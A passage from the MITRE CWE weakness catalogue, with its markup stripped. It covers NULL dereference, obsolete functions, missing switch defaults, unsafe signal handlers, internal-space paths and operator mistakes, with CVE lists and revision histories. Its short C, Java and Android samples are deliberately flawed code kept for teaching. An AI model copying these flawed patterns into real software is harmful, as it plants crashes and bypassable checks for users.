struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy(). - Note that this code is also vulnerable to a buffer overflow (CWE-119). - - - In the following code, the programmer assumes that the system always has a property named "cmd" defined. If an attacker can control the program's environment so that "cmd" is not defined, the program throws a NULL pointer exception when it attempts to call the trim() method. - - String cmd = System.getProperty("cmd");cmd = cmd.trim(); - - - - This Android application has registered to handle a URL when sent an intent: - - - - ... - IntentFilter filter = new IntentFilter("com.example.URLHandler.openURL");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter); - ... - - public class UrlHandlerReceiver extends BroadcastReceiver { - @Overridepublic void onReceive(Context context, Intent intent) { - if("com.example.URLHandler.openURL".equals(intent.getAction())) {String URL = intent.getStringExtra("URLToOpen");int length = URL.length(); - - ... - } - } - } - - The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called. - - - - - CVE-2005-3274 - race condition causes a table to be corrupted if a timer activates while it is being modified, leading to resultant NULL dereference; also involves locking. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3274 - - - CVE-2002-1912 - large number of packets leads to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1912 - - - CVE-2005-0772 - packet with invalid error status value triggers NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0772 - - - CVE-2009-4895 - Chain: race condition for an argument value, possibly resulting in NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895 - - - CVE-2009-2692 - Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 - - - CVE-2009-3547 - Chain: race condition might allow resource to be released before operating on it, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 - - - CVE-2009-3620 - Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 - - - CVE-2009-2698 - Chain: IP and UDP layers each track the same value with different mechanisms that can get out of sync, possibly resulting in a NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698 - - - CVE-2009-2692 - Chain: uninitialized function pointers can be dereferenced allowing code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692 - - - CVE-2009-0949 - Chain: improper initialization of memory can lead to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949 - - - CVE-2008-3597 - Chain: game server can access player data structures before initialization has happened leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597 - - - CVE-2020-6078 - Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078 - - - CVE-2008-0062 - Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 - - - CVE-2008-5183 - Chain: unchecked return value can lead to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183 - - - CVE-2004-0079 - SSL software allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake that triggers a null dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0079 - - - CVE-2004-0365 - Network monitor allows remote attackers to cause a denial of service (crash) via a malformed RADIUS packet that triggers a null dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0365 - - - CVE-2003-1013 - Network monitor allows remote attackers to cause a denial of service (crash) via a malformed Q.931, which triggers a null dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1013 - - - CVE-2003-1000 - Chat client allows remote attackers to cause a denial of service (crash) via a passive DCC request with an invalid ID number, which causes a null dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1000 - - - CVE-2004-0389 - Server allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0389 - - - CVE-2004-0119 - OS allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted request during authentication protocol selection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0119 - - - CVE-2004-0458 - Game allows remote attackers to cause a denial of service (server crash) via a missing argument, which triggers a null pointer dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0458 - - - CVE-2002-0401 - Network monitor allows remote attackers to cause a denial of service (crash) or execute arbitrary code via malformed packets that cause a NULL pointer dereference. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0401 - - - - - Null Dereference - - - Null-pointer dereference - - - Null Dereference (Null Pointer Dereference) - - - A9 - Denial of Service - CWE More Specific - - - EXP34-C - Do not dereference null pointers - Exact - - - SFP7 - Faulty Pointer Use - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Demonstrative_Examples, Other_Notes, Potential_Mitigations, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Observed_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained. - - As programming languages evolve, functions occasionally become obsolete due to: - - - Advances in the language - Improved understanding of how operations should be performed effectively and securely - Changes in the conventions that govern certain operations - - - Functions that are removed are usually replaced by newer counterparts that perform the same task in some different and hopefully improved way. - - - - - - - Indirect - - - - - - - - Implementation - - - - - Other - Quality Degradation - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Binary / Bytecode Quality Analysis - - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Debugger - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source Code Quality Analyzer - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Origin Analysis - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Implementation - Refer to the documentation for the obsolete function in order to determine why it is deprecated or obsolete and to learn about alternative ways to achieve the same functionality. - - - Requirements - Consider seriously the security implications of using an obsolete function. Consider using alternate functions. - - - - - The following code uses the deprecated function getpw() to verify that a plaintext password matches a user's encrypted password. If the password is valid, the function sets result to 1; otherwise it is set to 0. - - ...getpw(uid, pwdline);for (i=0; i<3; i++){cryptpw=strtok(pwdline, ":");pwdline=0;}result = strcmp(crypt(plainpw,cryptpw), cryptpw) == 0;... - - Although the code often behaves correctly, using the getpw() function can be problematic from a security standpoint, because it can overflow the buffer passed to its second parameter. Because of this vulnerability, getpw() has been supplanted by getpwuid(), which performs the same lookup as getpw() but returns a pointer to a statically-allocated structure to mitigate the risk. Not all functions are deprecated or replaced because they pose a security risk. However, the presence of an obsolete function often indicates that the surrounding code has been neglected and may be in a state of disrepair. Software security has not been a priority, or even a consideration, for very long. If the program uses deprecated or obsolete functions, it raises the probability that there are security problems lurking nearby. - - - In the following code, the programmer assumes that the system always has a property named "cmd" defined. If an attacker can control the program's environment so that "cmd" is not defined, the program throws a null pointer exception when it attempts to call the "Trim()" method. - - String cmd = null;...cmd = Environment.GetEnvironmentVariable("cmd");cmd = cmd.Trim(); - - - - The following code constructs a string object from an array of bytes and a value that specifies the top 8 bits of each 16-bit Unicode character. - - ...String name = new String(nameBytes, highByte);... - - In this example, the constructor may not correctly convert bytes to characters depending upon which charset is used to encode the string represented by nameBytes. Due to the evolution of the charsets used to encode strings, this constructor was deprecated and replaced by a constructor that accepts as one of its parameters the name of the charset used to encode the bytes for conversion. - - - - - Obsolete - - - SFP3 - Use of an improper API - - - DCL30-PL - Do not import deprecated modules - CWE More Specific - - - EXP30-PL - Do not use deprecated or obsolete functions or modules - CWE More Specific - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Name, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Obsolete - Use of Obsolete Functions - - - - The code does not have a default case in a switch statement, which might lead to complex logical errors and resultant weaknesses. - This flaw represents a common problem in software development, in which not all possible values for a variable are considered or handled by a given process. Because of this, further decisions are made based on poor information, and cascading failure results. This cascading failure may result in any number of security issues, and constitutes a significant failure in the system. - - - - - - Primary - - - - - - - - - - - Implementation - - - - - Integrity - Varies by Context - Alter Execution Logic - Depending on the logical circumstances involved, any consequences may result: e.g., issues of confidentiality, authentication, authorization, availability, integrity, accountability, or non-repudiation. - - - - - Implementation - Ensure that there are no unaccounted for cases, when adjusting flow or values based on the value of a given variable. In switch statements, this can be accomplished through the use of the default label. - - - Implementation - In the case of switch style statements, the very simple act of creating a default case can mitigate this situation, if done correctly. Often however, the default case is used simply to represent an assumed option, as opposed to working as a check for invalid input. This is poor practice and in some cases is as bad as omitting a default case entirely. - - - - - The following does not properly check the return code in the case where the security_check function returns a -1 value when an error occurs. If an attacker can supply data that will invoke an error, the attacker can bypass the security check: - - #define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) { - case FAILED:printf("Security check failed!\n");exit(-1); - //Break never reached because of exit() - break; - case PASSED:printf("Security check passed.\n");break; - - } - // program execution continues... - ... - - Instead a default label should be used for unaccounted conditions: - - #define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) { - case FAILED:printf("Security check failed!\n");exit(-1); - //Break never reached because of exit() - break; - case PASSED:printf("Security check passed.\n");break; - default:printf("Unknown error (%d), exiting...\n",result);exit(-1); - - } - - This label is used because the assumption cannot be made that all possible cases are accounted for. A good practice is to reserve the default case for error handling. - - - In the following Java example the method getInterestRate retrieves the interest rate for the number of points for a mortgage. The number of points is provided within the input parameter and a switch statement will set the interest rate value to be returned based on the number of points. - - public static final String INTEREST_RATE_AT_ZERO_POINTS = "5.00";public static final String INTEREST_RATE_AT_ONE_POINTS = "4.75";public static final String INTEREST_RATE_AT_TWO_POINTS = "4.50";...public BigDecimal getInterestRate(int points) { - BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS); - switch (points) { - case 0:result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break; - case 1:result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break; - case 2:result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break; - - }return result; - } - - However, this code assumes that the value of the points input parameter will always be 0, 1 or 2 and does not check for other incorrect values passed to the method. This can be easily accomplished by providing a default label in the switch statement that outputs an error message indicating an invalid value for the points input parameter and returning a null value. - - public static final String INTEREST_RATE_AT_ZERO_POINTS = "5.00";public static final String INTEREST_RATE_AT_ONE_POINTS = "4.75";public static final String INTEREST_RATE_AT_TWO_POINTS = "4.50";...public BigDecimal getInterestRate(int points) { - BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS); - switch (points) { - case 0:result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break; - case 1:result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break; - case 2:result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break; - default:System.err.println("Invalid value for points, must be 0, 1 or 2");System.err.println("Returning null value for interest rate");result = null; - - } - return result; - } - - - - - - Failure to account for default case in switch - - - SFP4 - Unchecked Status Condition - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - Failure to Account for Default Case in Switch - Failure to Use Default Case in Switch - - - - The program defines a signal handler that calls a non-reentrant function. - - Non-reentrant functions are functions that cannot safely be called, interrupted, and then recalled before the first call has finished without resulting in memory corruption. This can lead to an unexpected system state and unpredictable results with a variety of potential consequences depending on context, including denial of service and code execution. - Many functions are not reentrant, but some of them can result in the corruption of memory if they are used in a signal handler. The function call syslog() is an example of this. In order to perform its functionality, it allocates a small amount of memory as "scratch space." If syslog() is suspended by a signal call and the signal handler calls syslog(), the memory used by both of these functions enters an undefined, and possibly, exploitable state. Implementations of malloc() and free() manage metadata in global structures in order to track which memory is allocated versus which memory is available, but they are non-reentrant. Simultaneous calls to these functions can cause corruption of the metadata. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Low - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - It may be possible to execute arbitrary code through the use of a write-what-where condition. - - - Integrity - Modify Memory - Modify Application Data - Signal race conditions often result in data corruption. - - - - - Requirements - Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness. - - - Architecture and Design - Design signal handlers to only set flags rather than perform complex functionality. - - - Implementation - Ensure that non-reentrant functions are not found in signal handlers. - - - Implementation - Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally. - Defense in Depth - - - - - In this example, a signal handler uses syslog() to log a message: - - char *message;void sh(int dummy) {syslog(LOG_NOTICE,"%s\n",message);sleep(10);exit(0);}int main(int argc,char* argv[]) {...signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);}If the execution of the first call to the signal handler is suspended after invoking syslog(), and the signal handler is called a second time, the memory allocated by syslog() enters an undefined, and possibly, exploitable state. - - - - - - - CVE-2005-0893 - signal handler calls function that ultimately uses malloc() - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0893 - - - CVE-2004-2259 - SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259 - - - - System Process - - - - Unsafe function call from a signal handler - - - SIG30-C - Call only asynchronous-safe functions within signal handlers - Exact - - - SIG34-C - Do not call signal() from within interruptible signal handlers - - - EXP01-J - Never dereference null pointers - - - SFP3 - Use of an improper API - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, References, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Common_Consequences - - Unsafe Function Call from a Signal Handler - - - - A software system that accepts path input in the form of internal space ('file(SPACE)name') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - CVE-2000-0293 - Filenames with spaces allow arbitrary file deletion when the product does not properly quote them; some overlap with path traversal. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293 - - - CVE-2001-1567 - "+" characters in query string converted to spaces before sensitive file/extension (internal space), leading to bypass of access restrictions to the file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1567 - - - - - file(SPACE)name (internal space) - - - A9 - Denial of Service - CWE More Specific - - - SFP16 - Path Traversal - - - - This weakness is likely to overlap quoting problems, e.g. the "Program Files" unquoted search path (CWE-428). It also could be an equivalence issue if filtering removes all extraneous spaces. - Whitespace can be a factor in other weaknesses not directly related to equivalence. It can also be used to spoof icons or hide files with dangerous names (see icon manipulation and visual truncation in CWE-451). - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Internal Space - file(SPACE)name - - - - The programmer accidentally uses the wrong operator, which changes the application logic in security-relevant ways. - These types of errors are generally the result of a typo. - - - - - - - - - - - - Implementation - - - Low - - - Other - Alter Execution Logic - This weakness can cause unintended logic to be executed and other unexpected application behavior. - - - - - Automated Static Analysis - This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program. - - - Manual Static Analysis - This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program. - - - - - The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100. - - int isValid(int value) {if (value=100) {printf("Value is valid\n");return(1);}printf("Value is not valid\n");return(0);} - - - bool isValid(int value) {if (value=100) {Console.WriteLine("Value is valid.");return true;}Console.WriteLine("Value is not valid.");return false;} - - However, the expression to be evaluated in the if statement uses the assignment operator "=" rather than the comparison operator "==". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results. - - - The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable. - - #define SIZE 50int *tos, *p1, stack[SIZE]; - void push(int i) { - p1++;if(p1==(tos+SIZE)) { - - - // Print stack overflow error message and exit - - - }*p1 == i; - } - int pop(void) { - if(p1==tos) { - - - // Print stack underflow error message and exit - - - }p1--;return *(p1+1); - } - int main(int argc, char *argv[]) { - - - // initialize tos and p1 to point to the top of stack - tos = stack;p1 = stack; - // code to add and remove items from stack - ...return 0; - } - - The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable. - However, this expression uses the comparison operator "==" rather than the assignment operator "=". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results. - - - - - Using the wrong operator - - - EXP45-C - Do not perform assignments in selection statements - CWE More Abstract - - - EXP46-C - Do not use a bitwise operator with a Boolean-like operand - CWE More Abstract - - - SFP1 - Glitch in Computation - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Description, Detection_Factors, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Relationships - - Using the Wrong Operator - - - - The code uses an operator for assignment when the intention was to perform a comparison. - In many languages the compare statement is very close in appearance to the assignment statement and are often confused. This bug is generally the result of a typo and usually causes obvious problems with program execution. If the comparison is in an if statement, the if statement will usually evaluate the value of the right-hand side of the predicate. - - - - - - - - - - - - - Implementation - - - Low - - - Other - Alter Execution Logic - - - - - Testing - Many IDEs and static analysis products will detect this problem. - - - Implementation - Place constants on the left. If one attempts to assign a constant with a variable, the compiler will produce an error. - - - - - The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100. - - int isValid(int value) {if (value=100) {printf("Value is valid\n");return(1);}printf("Value is not valid\n");return(0);} - - - bool isValid(int value) {if (value=100) {Console.WriteLine("Value is valid.");return true;}Console.WriteLine("Value is not valid.");return false;} - - However, the expression to be evaluated in the if statement uses the assignment operator "=" rather than the comparison operator "==". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results. - - - In this example, we show how assigning instead of comparing can impact code when values are being passed by reference instead of by value. Consider a scenario in which a string is being processed from user input. Assume the string has already been formatted such that different user inputs are concatenated with the colon character. When the processString function is called, the test for the colon character will result in an insertion of the colon character instead, adding new input separators. Since the string was passed by reference, the data sentinels will be inserted in the original string (CWE-464), and further processing of the inputs will be altered, possibly malformed.. - - void processString (char *str) { - int i; - for(i=0; i<strlen(str); i++) {if (isalnum(str[i])){processChar(str[i]);}else if (str[i] = ':') {movingToNewInput();}}} - } - - - - The following Java example attempts to perform some processing based on the boolean value of the input parameter. However, the expression to be evaluated in the if statement uses the assignment operator "=" rather than the comparison operator "==". As with the previous examples, the variable will be reassigned locally and the expression in the if statement will evaluate to true and unintended processing may occur. - - public void checkValid(boolean isValid) {if (isValid = true) {System.out.println("Performing processing");doSomethingImportant();}else {System.out.println("Not Valid, do not perform processing");return;}} - - While most Java compilers will catch the use of an assignment operator when a comparison operator is required, for boolean variables in Java the use of the assignment operator within an expression is allowed. If possible, try to avoid using comparison operators on boolean variables in java. Instead, let the values of the variables stand for themselves, as in the following code. - - public void checkValid(boolean isValid) {if (isValid) {System.out.println("Performing processing");doSomethingImportant();}else {System.out.println("Not Valid, do not perform processing");return;}} - - Alternatively, to test for false, just use the boolean NOT operator. - - public void checkValid(boolean isValid) {if (!isValid) {System.out.println("Not Valid, do not perform processing");return;}System.out.println("Performing processing");doSomethingImportant();} - - - - The following example demonstrates the weakness. - - void called(int foo){if (foo=1) printf("foo\n");}int main() { - - called(2);return 0; - } - - - - - - Assigning instead of comparing - - - SFP1 - Glitch in computation - - - EXP45-C - Do not perform assignments in selection statements - CWE More Abstract - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE 